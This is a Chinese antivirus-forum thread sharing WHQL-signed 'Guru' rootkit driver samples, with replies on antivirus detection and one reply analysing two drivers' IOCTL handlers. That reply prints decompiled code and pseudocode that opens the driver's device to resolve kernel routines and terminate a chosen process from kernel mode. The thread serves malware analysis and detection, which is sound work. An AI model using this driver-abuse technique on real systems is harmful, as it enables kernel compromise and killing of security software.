查看: 651|回复: 17
收起左侧

[病毒样本] #Guru #WHQL #Rootkit

[复制链接]
ANY.LNK
发表于 19 小时前 | 显示全部楼层 |阅读模式
依据https://bbs.kafan.cn/thread-2290902-1-1.html查找关联得到的样本,都具有有效的WHQL签名


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2人气 +3 收起 理由
DisaPDB + 2
xiaozhu009 + 1 感谢提供分享

查看全部评分

ZXCVDS
发表于 14 小时前 | 显示全部楼层
360kill
浦北光
发表于 13 小时前 | 显示全部楼层
卡巴斯基 scan miss
xjwtzq
发表于 12 小时前 | 显示全部楼层
本帖最后由 xjwtzq 于 2026-4-18 09:18 编辑

奇安信 kill    这些驱动竟然能够通过签名,厉害

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
846472713
发表于 12 小时前 | 显示全部楼层

这个有安装包吗?需要卸载密码吗?
xjwtzq
发表于 12 小时前 | 显示全部楼层
本帖最后由 xjwtzq 于 2026-4-18 09:31 编辑
846472713 发表于 2026-4-18 09:19
这个有安装包吗?需要卸载密码吗?

安装包,需要卸载密码
846472713
发表于 12 小时前 | 显示全部楼层
VSE 2x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
passionCN
发表于 12 小时前 | 显示全部楼层
ESET kill,感觉360、卡巴要慢半拍。
blackmonster233
发表于 12 小时前 | 显示全部楼层
bdts

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 9 小时前 | 显示全部楼层
本帖最后由 DisaPDB 于 2026-4-18 12:54 编辑

6ae294cb5c71118350342e6a26350d0e95ea23d0548125b09056efa0ea19bf45.sys


一个内核模式状态机,v10 是从 MasterIrp->Flags 转换来的函数指针,完全由用户态控制。
用户可以通过 IOCTL 让内核执行任意地址的函数

17aae57cf6255c7eb169bf62ea67376d9708976eb7831f8cdd0ea38bdcb37dc4.sys

这个MasterIrp结构可以直接让用户态读取任意指针和内存地址执行操作
  1. if ( *(_QWORD *)&MasterIrp->Type == 1000LL )
  2. {
  3.     RtlInitAnsiString(&SourceString, (PCSZ)&MasterIrp->MdlAddress);
  4. RtlAnsiStringToUnicodeString(&DestinationString, &SourceString, 1);
  5.     SystemRoutineAddress = MmGetSystemRoutineAddress(&DestinationString);
  6.     MasterIrp->MdlAddress = SystemRoutineAddress;
  7. }
复制代码
后面的,命令1001允许调用任意内核函数地址
配合命令1000获取任意函数地址,用户态可实现任意内核操作
也就是说,ring3程序可以这么写……(伪代码)
  1. int main()
  2. {
  3.     HANDLE hDevice = CreateFileW(L"\\\\.\\Guru8906", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
  4.     if (hDevice == INVALID_HANDLE_VALUE) return 1;
  5.     ULONG_PTR pPsGetCurrentProcess, pPsLookupProcessByProcessId, pZwTerminateProcess;
  6.     GetKernelFunctionAddress(hDevice, "PsGetCurrentProcess", &pPsGetCurrentProcess);
  7.     GetKernelFunctionAddress(hDevice, "PsLookupProcessByProcessId", &pPsLookupProcessByProcessId);
  8.     GetKernelFunctionAddress(hDevice, "ZwTerminateProcess", &pZwTerminateProcess);
  9.     ULONG_PTR pTargetEprocess = 0;
  10.     CallKernelFunction(hDevice, pPsLookupProcessByProcessId, 1234, (ULONG_PTR)&pTargetEprocess, 0,0,0, NULL);
  11.     CallKernelFunction(hDevice, pZwTerminateProcess, pTargetEprocess, 0, 0,0,0, NULL);
  12.     CloseHandle(hDevice);
  13.     return 0;
  14. }
复制代码
总的来说,这俩都是“故意编写的漏洞驱动”,如果没有ring3程序发控制码的话也不会有恶意行为。如果能拿到ring3程序的话可能会更清楚一些。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +4 收起 理由
ANY.LNK + 4 果然是同一批样本,这代码都是同源的

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-18 22:12 , Processed in 0.089159 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表